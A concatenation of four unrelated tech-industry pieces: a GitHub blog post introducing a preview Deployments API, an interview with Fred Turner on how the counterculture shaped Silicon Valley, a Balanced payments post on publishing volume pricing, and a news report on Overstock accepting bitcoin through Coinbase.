Deployments are a new model in the GitHub ecosystem. We don’t have any UI components currently, and deployments are intended to be used exclusively by tooling. If you’re familiar with the Status API, you know that it allows various tools to report on the status of a commit (e.g., the progress of an attempt to perform a build at a particular commit). The Status API doesn’t perform the build; it just reports the results. Much like the Status API, we won’t be doing actual deployments for you. Instead, the API provides a way for you to track the status of your deployments. We’re hoping to provide consistency across the various type of release processes, regardless of the underlying steps involved with getting your code built or shipped to your servers.

Highlights

Automatic Merging

The system can auto-merge the default branch for the repository if the requested deployment ref is behind the default branch. On active projects it’s easy to fall behind, so let automation watch your back.

Commit Status Integration

By default, the system rejects deployment requests for repositories that have commit statuses but don’t have a green build for the deployment ref. This can be bypassed, but is useful in cases where continuous integration is being used.

Force Deployments

Sometimes the world crashes down on you, and you need to just get the code out the door. Forced deployments bypass any commit status checks or ahead/behind checks in the repository.

Deployment Statuses

Different deployment systems can update the status of a deployment to bepending, success, failure, or error. There’s also a field for linking to deployment output.

Events

Both Deployments and Deployment Statuses trigger events on GitHub. 3rd party integrations can listen for these events via webhooks and choose whether or not to actually deploy the repository that the event was created for.

Preview Period

We’re making this new API available today for developers to preview. We think developers and existing integrations are going to love it, but we want to get your feedback before we declare the Deployments API “final” and “unchangeable.” We expect the preview period to last for roughly 60-90 days.

As we discover opportunities to improve the API during the preview period, we may ship changes that break clients using the preview version of the API. We want to iterate quickly. To do so, we will announce any changes here (on the developer blog), but we will not provide any advance notice.

At the end of preview period, the Deployments API will become an official component of GitHub API v3. At that point, the new Deployments API will be stable and suitable for production use.

We hope you’ll take it for a spin and send us your feedback.

Silicon Valley has been taking a lot of heat lately for its power and elitism. That’s only natural for a region that has rapidly gained enormous economic and cultural clout. But it seems especially ironic that this is happening in the San Francisco Bay area, that one-time headquarters of flower power where entrepreneurs have long fashioned themselves as rebels and iconoclasts battling robotic rivals (Microsoft, IBM) and liberating workers from the hierarchical ways of corporate life.

Thinking about this got me wondering how exactly those California hippies (I grew up in the Bay area in the 1960s and 1970s, so I’m allowed to make sweeping and largely inaccurate generalizations like that, right?) became The Man. So I asked Fred Turner.

Turner, a professor of communications at Stanford, is the author of a book I had been meaning to read for a while, From Counterculture to Cyberculture: Stewart Brand, the Whole Earth Network, and the Rise of Digital Utopianism. Now I’ve read it, and it’s great, an academic but extremely accessible history of ideas that explains a lot about how people in Silicon Valley think and talk. Its central character, Brand, went from Stanford student to one of author Ken Kesey’s LSD-popping Merry Pranksters to founding the iconic Whole Earth Catalog to helping shape the Valley’s modern business ethos in innumerable ways. Other important figures in the book include Wired’s founding executive editor, Kevin Kelly, and Electronic Frontier Foundation co-founder John Perry Barlow.

Turner also has a new book out this month that he bills as a prequel From Counterculture to Cyberculture, The Democratic Surround: Multimedia and American Liberalism from World War II to the Psychedelic Sixties, but I talked to him mainly about the lessons of the first book. What follows are edited excerpts of our conversation.

Is there something about the Silicon Valley ethos that was legitimate before and is less so now? Or is this kind of a conflict that’s always been there?

I think there’s always been a tension between the countercultural rhetoric of Silicon Valley and its insurgent but ultimately corporate ethos. It’s much easier to claim a kind of insurgent stance when you are in fact a brand-new industry and you’re taking on groups like Microsoft. At this point, Google is not a small player. It may have come on the scene quickly, but it’s huge, as are Facebook and a number of other local players. So the irony is that they’ve entered a place of corporate dominance with a rhetoric built from an era of business insurgency. That’s an irony that we’re living with at the moment. But I do think that there’s always been a tension between being a liberating force and being The Man. And that goes back to the counterculture.

I always thought the ‘60s and the counterculture were one thing. I didn’t understand until I started doing that book that in fact there were two actually fairly distinct movements, one, the New Left, doing politics to change politics, and the other, what I ended up calling the New Communalists, who were headed back to the land and wanted to change the world by changing essentially their minds, their consciousness. That first group, the New Left, believed in bureaucracy, believed in hierarchy, believed in organizations. The second group, the New Communalists, believed in doing away with all of those things and turning instead to small-scale technologies, LSD, Buckminster Fuller’s geodesic domes, etc. as technologies with which to kind of change our minds.

Having gotten our minds changed, having gotten our heads together, as the phrase went, we could then build communities oriented around the shared mindset. We would no longer need rules. We would no longer need governance. We would no longer need bureaucracy or hierarchy at all. Now the trouble is, when you actually do that, and folks discovered this on the communes, you end up embracing the very social norms that organize life outside of bureaucracy.

Bureaucratic systems are actually really good systems for distributing resources. You have to negotiate. You have to express explicitly what resources exist and how they should be distributed. In a communal system built around shared consciousness, what starts to happen is that people with charisma start to lead and cultural norms kick in. Communes ended up being places that were deeply racially divided, even though none of them would ever cop to being explicitly racist or wouldn’t even want to be. Gender norms were incredibly conservative on communes. I don’t know how many photographs I’ve looked at of young women, pregnant, barefoot, carrying loaves of bread.

One of the things that I think we’ve inherited from the ‘60s is a habit of seeing the cultural space as the space in which we do business and make change. And the trouble with that is that it makes it very hard to negotiate things like class or race or distribution of the kind of social goods that come from business.

A great example of this on the ground in Mountain View where I live today is Google. Google treats its engineers extremely well, offers extremely flexible work spaces, has built essentially a culture of collaboration and creativity that looks very communal and very wonderful, even as around those engineers it has cafeteria workers who are making something very close to minimum wage, and often lack the ability to get proper health insurance. That’s the kind of old communal mindset right there, where you bring together a kind of elite, give them a shared mindset, all the resources they need to live in that mindset, and yet surround them with folks who are relatively impoverished, often racially different, certainly members of a different class. In that sense, the communes were already The Man. And we’ve inherited their legacy.

But it’s not like Larry Page and Sergey Brin ever lived on a commune. They came along long after the counterculture. How do you draw that connection?

One of the great mistakes people made in reviewing my book was to say, “Wow, it’s great. Turner finally showed us how the hippies brought us computing.” Nothing could be further from the truth. What I think I did in the book was actually show how the research world that brought us computing also brought us the counterculture. In the ‘40s, we see military industrial research in and around MIT and around a variety of other centers being incredibly collaborative and open. It’s that style that actually migrates into and shapes countercultural practices. What the counterculture does for computing is it legitimates it. It makes it culturally cool.

What we’ve inherited in the contemporary setting are both of those features. We’ve inherited a very powerful, technology-centered research culture that is, in its own terms, very flexible, very creative, very collaborative. But we’ve also inherited a kind of ethos, a kind of ideology, a sense of cool that comes from the counterculture having legitimated that style back in the ‘60s. That’s what you see in Google. You see both the innovation and the ethos of cool.

Another thing, even though the Bay Area leans Democratic and culturally feels like it’s at one in certain ways with East Coast liberals, libertarianism is a big part of how people think there. And, reading your book, that’s been there for a long time.

A legacy from the communalist movement that I think is pernicious is a turning away from politics, a turning toward the self as the basis of political change, of social action. I think that’s something you see all through the Valley. The information technology industry feeds off it because information technologies can so easily be aimed at satisfying individual needs. You see that rhetoric leveraged when Google and other firms say, “Don’t regulate us. We need to be creative. We need to be free to pursue our satisfaction because that’s ultimately what will provide a satisfying society.”

That’s all a way of ignoring the systems that make the world possible. One example from the ‘60s that I think is pretty telling is all the road trips. The road trips are always about the heroic actions of people like Ken Kesey and Neal Cassady and their amazing automobiles, right? Never, never did it get told that those road trips were only made possible by Eisenhower’s completion of the highway system. The highway system is never in the story. It’s boring. What’s in the story is the heroic actions of bootstrapped individuals pursuing conscious change. What we see out here now is, again, those heroic stories. And there are real heroes. But the real heroes are operating with automobiles and roads and whole systems of support without which they couldn’t be heroic.

I saw Stewart Brand at a conference a couple months ago. He was describing the difference between Berkeley and the Peninsula [what’s now called Silicon Valley] in the ‘60s. And his argument was that Berkeley was about power to the people. And he was about power to people.

My challenge to that view would be that power to people is a really good way of ignoring the structural differences between kinds of people. Structurelessness is a problem. And it’s less of a problem when you share cultural similarities with other folks, or genotypic or phenotypic similarities. So Stewart Brand’s circle tends to look a lot like Stewart Brand. It tends to be mostly white, often male. And that’s true for many elite Silicon Valley leaders. I don’t think that shared cultural similarity is a sufficient structure. It results in bad distribution of resources. It gets very hard to get resources to people who are different than yourself. I think our challenge is to find ways to reach out to folks who are different than ourselves, not to build clusters of likeminded people.

On the other hand, since both of us are kind of dumping on this ethos, it has been enormously successful.

It’s so interesting to think about what success means in this context. I mean, has it led to technological innovation? Absolutely, an efflorescence of technological innovation. Has it led to an incredible diversity of consumer goods, and to the time for those who make them to enjoy them? Absolutely, really powerfully. Has it, on the other hand, done some of the things that used to be goals of business in the ‘40s and the ‘50s?

I’ve spent a lot of time researching the ‘40s and ‘50s, and I keep encountering these very civic-minded business leaders who see as their mission simultaneously the making of profit and the making of a better society. Has the rise of information technology and the expansion of what was originally the military-industrial complex substantially improved our lives? The jury’s still out on that. I can certainly connect with my friends more easily. But am I living in a world where more people have more resources? You know, the economic numbers don’t bear that out. What we see is a society bifurcating very rapidly between the haves and the have nots, and the middle class melting away. Have we built a society that is more racially accepting, more racially diverse? To some degree, less degree than I’d like to see. I think that even as we’ve innovated like crazy, we haven’t solved some of the problems of inequality and diversity that were core to the ‘60s and core to business in the ‘40s and ‘50s.

That seems like a good place to wrap it up. But I also want to give you a chance, since you have a new book coming out, which you’ve described as a prequel to From Counterculture to Cyberculture, to tell a little bit about it.

One interesting thing about the 1960s was how many people in that period were actually reading books from the 1940s. I was always told that the 1960s were a rebellion, that they overthrew this kind of gray, bureaucratic, mass-mediated era. What I discovered was that on the contrary, they embraced a whole series of collaborative, wild, socially benevolent ideals from the ‘40s and made them their own in the ‘60s. The book opens in the late ‘30s with a moment in which Americans are terribly afraid that mass-media technologies are going to turn us into fascists. And it shows how a whole series of American intellectuals and artists, John Cage and many others, build multimedia environments in the hope of creating a new kind of democratic person. Those multimedia environments and that person end up in the 1960s as Stewart Brand, building the kind of creative, technology-centered communities that become the basis of the world we see now.

And the books from the ‘40s that they’re reading, some of them you mentioned in From Counterculture to Cyberculture, like Norbert Wiener’s Cybernetics and The Human Use of Human Beings…

Norbert Wiener is part of it. But the other part of it that I hadn’t known as much was anthropology and psychology. So they’re reading Erich Fromm. They’re reading Margaret Mead. They’re reading Gregory Bateson. Those folks are, in the ‘40s and ‘50s, pushing back very hard and very publicly against the kind of right-wing stuff that we remember from that period. So they’re writing against racism. They’re writing in favor of a sexually diverse America. They’re writing in favor of personal satisfaction as the proper measure of a society’s quality. All of those become core ideas in the ‘60s. And they were all there in the ‘40s and ‘50s very publicly, in a way that we’ve simply forgotten. The other piece that I think is important in that book for the stories that we’re talking about today is the rise of multimedia as a mode. We live surrounded by screens right now. That kind of surrounding by screens is something that the intellectuals and artists of the ‘40s and ‘50s explicitly called for as an alternative to mass media, as an alternative to cinema and radio and newspapers, which they believe had empowered Germany and American leaders to create hierarchical, top down, potentially fascist sorts of societies. When I walk around Silicon Valley now and hear the critique of hierarchy, I’m hearing Margaret Mead again. And I’m hearing Ruth Benedict and I’m hearing Gregory Bateson talk about the need to build multimedia environments in which people can find themselves by selecting images and sounds from around them, fulfilling their individual destinies, and thereby building a more democratic, less hierarchical, more egalitarian sort of society. That’s the connection.

[Our conversation then went off topic for a while, but eventually returned to a discussion of the value of intellectual history. I said that studying it makes clear to what extent ideas and ideologies are the product of historical circumstance.] It gives you this feeling of “Oh, so this isn’t ordained by nature.”

I think that’s right. The ability to claim to be ordained by nature is something industrial players in particular strive for. This is where we get some of that early 20th Century social Darwinism, you know? My company isn’t just successful, it is ordained by nature. You can see that happening out here now in Silicon Valley all over the place. There’s this wonderful circular logic I see at Google, where the saying is, “Don’t be evil.” OK, fine, what’s good? Well, providing information is good. Who provides the information? Google. Oh, what’s good for Google is good for the world. You know, the natural order needs information. And who provides it? Well naturally, Google.

There’s quite a lot of that going around. So I think that the work of disenchanting that and sort of saying it could have been otherwise is important.

Balanced Makes Volume Pricing Public posted by: Matin Tamizi

I was negotiating with one of our banking partners a few months ago for a discount based on the increase in our transaction volume. I also asked for pricing tiers, so that I would know what the pricing would look like in the future as our we continue to grow. The bank responded with something on the lines of, “We don’t do that, but we can revisit the pricing later.”

How was I supposed to plan if I don’t know what the price will be in the future? Why did I even have to spend so much time negotiating? Why not just give me the pricing formula? I didn’t understand why it was so complicated. Then something (my co-founder, Jareau) hit me. We do the exact same thing.

We’ve had a standard pricing formula internally for some time now, but we hadn’t published it for everyone to see. There wasn’t any reason why. We followed the same formula for everyone.

Without further ado, here it is

You can see our full pricing list on our pricing page

Overstock.com is now accepting payments in bitcoin, making it the first major online retailer to embrace the increasingly popular but controversial digital currency.

Since December, Overstock’s free-thinking CEO and chairman, Patrick Byrne, has been telling anyone who would listen that his company would adopt bitcoin sometime in the next six months. But Byrne is an impatient man. Last Tuesday, the company struck a deal to handle bitcoin payments through a service operated by the suddenly hot San Francisco startup Coinbase, and since then, a team of Overstock engineers has worked almost every waking hour to prepare the site for what is undeniably a key moment in the digital currency’s short history.

“I felt I had tipped my hand,” Byrne says. “I didn’t want someone else to beat us.”

So, just minutes ago, Overstock started accepting bitcoin payments for everything it sells, from laptops and TVs to faucets and bar stools. Byrne believes this can ultimately boost the company’s bottom line, but that’s not his only aim. For Byrne, a rather opinionated libertarian who’s unafraid to take his company places others fear to tread, embracing the cryptocurrency is as much a political statement as a business decision. Like so many others, he believes bitcoin can free the world from the control of big banks and big government. “It helps us fight the machine,” he says.

Created just over five years ago by an anonymous computer programmer (or group of programmers), bitcoin entered mainstream consciousness this past fall, when U.S. government regulators seemed to give it their stamp of approval and its value topped $1,000 on popular exchanges. That shows a huge leap in demand, but many people are interested in the currency only as an investment — an asset whose value keeps going up. Overstock and Coinbase aim to turn bitcoin into a true currency that can be widely and regularly used to buy and sell goods and services.

You can already use bitcoin to buy hard goods from a hodgepodge of websites, from computer-parts seller Memorydealers to general stores like BitcoinShop.US. You can pay in bitcoins when using online services like the popular blogging tool WordPress and dating site OKCupid. You can even buy stuff like burritos and sandwiches in real-world restaurants and shops. But Overstock, with $1.3 billion dollars a year in sales, is by far the largest operation to accept bitcoin.

Coinbase co-founder Fred Ehrsam, who oversaw the deal with Overstock, says the move is important simply because Overstock is such a recognizable name. We’ve all seen their ads on cable TV, which is something you can’t say about the 19,000 other merchants using the Coinbase payment service, a kind of PayPal for bitcoin. “You have to consider the mainstream nature of it,” Ehrsam says. “Generally speaking, bitcoin merchants have fed the tech-early-adopter user base. But Overstock is not about that. This is about as mainstream as it gets.”

That said, Overstock is unlikely to see a huge number of bitcoin payments anytime soon. The bitcoin community remains relatively small, and with so many of them hoarding bitcoins as an investment, they’re reluctant to spend them on, say, patio furniture or an Xbox One. But Byrne is taking the long view.

“It does not worry me. ‘Mighty oaks from tiny acorns are sprung,’ and all that,” he says, before adding that some people will spend bitcoin on his site simply for the “thrill of contributing to this change.”

The Risk of Digital Currency

Many have assumed that Byrne and Overstock are taking a big financial risk in accepting bitcoin because the price of the digital currency is so volatile — at least for the moment. Overstock might accept a bitcoin payment when the digital currency is valued at $1,000, the argument goes, only to see the value rapidly drop to $750, or less. In the beginning, though, with relatively few payments going through the site, the risk will be low — and all of it will sit with Coinbase, not Overstock.

Before each payment is made, Coinbase sets an exchange rate, immediately converts the buyer’s bitcoin into dollars, and transfers the dollars to Overstock. The retailer never holds any bitcoin.

This setup could ultimately undercut tiny Coinbase. Eric Posner, a professor at the University of Chicago law school who explores financial markets and other economic issues, says that the risk is similar to what businesses face when dealing with overseas currencies that can fluctuate with the dollar. “Importers and exporters have to deal with this all the time,” he says. But unlike with government-backed currencies such as the euro and the yen, there is no derivatives market to help companies hedge their bitcoin bets.

Still, Coinbase — which recently received $25 million from big-name Silicon Valley venture capital firm Andreessen Horowitz — is confident it can minimize the risk by using software to carefully monitor price fluctuations. Coinbase runs a system that manages bitcoin transactions not only for businesses like Overstock but for about 750,000 individuals. Much as a bank like Goldman Sachs runs software to track price fluctuations as it juggles billions of dollars, Coinbase uses its hedging software to track all of the bitcoins it manages, deciding when to buy and sell bitcoins and adjust its exchange rate in an effort to minimize risk.

Goldman, where Coinbase’s Ehrsam previously worked, uses its software in an effort to make highly profitable trades, and Coinbase merely uses its system to protect its own position. But the inner-workings of the software are similar. “It’s algorithmic trading,” says Coinbase CEO Brian Armstrong. “It hedges that exchange rate risk in the background, every day.”

The Revolution Starts Here

In any event, Overstock has little to lose and much to gain, and Byrne believes the company’s move to bitcoin will have a knock-on effect, pushing other big online retailers, including Amazon, towards the digital currency.

Bitcoin, he says, can directly reduce the costs incurred by retailers like Overstock. Because the bitcoin system is driven by open source software running across thousands of machines around the globe and doesn’t answer to any one central authority, it’s a much less expensive way to accept payments than the major credit-card processors or PayPal. Yes, Overstock pays a fee to Coinbase, but Byrne says this is far less than what the company is paying to other processors. What’s more, bitcoin lets Overstock more easily and inexpensively accept payments from overseas, because bitcoin is available everywhere.

But Byrne sees an even bigger picture — one in which bitcoin provides new freedoms for the world at large, separating us from the whims and the flaws and the self-interests of banks and governments.

Many people remain skeptical that bitcoin can truly become a popular and reliable currency. Pundits like New York Times columnist and Nobel Prize-winning economist Paul Krugman believes the currency isn’t even a reliable store of value, much less a good means of transferring money from place to place.

But Byrne counts himself among the bitcoin proponents who see it as a currency whose value is controlled by people, not governments. That fits with his general worldview. As a philosophy student at Stanford, he studied the Austrian school of economics, which believes that our economy should rely on the judgments and choices of individuals, not a central authority, and he has long railed against what he sees as governmental overinvolvement in a precarious economy.

Like so many others, he says bitcoin is like gold. No government can devalue it simply by making more of it. “We want a money that some government mandarin can’t just whisk into existence with a pen stroke,” he says. “Bitcoin is that.” What’s more, it lets you store your money in a place that’s outside the control of big banks. “It just makes the world a better place,” he says. “It lets you get out of that world where you have to store your money with institutions you don’t trust.”

A bitcoin nirvana is still a long way off — if it ever comes at all. But, as Byrne says, you have to start somewhere. Mighty oaks, acorns, and all that.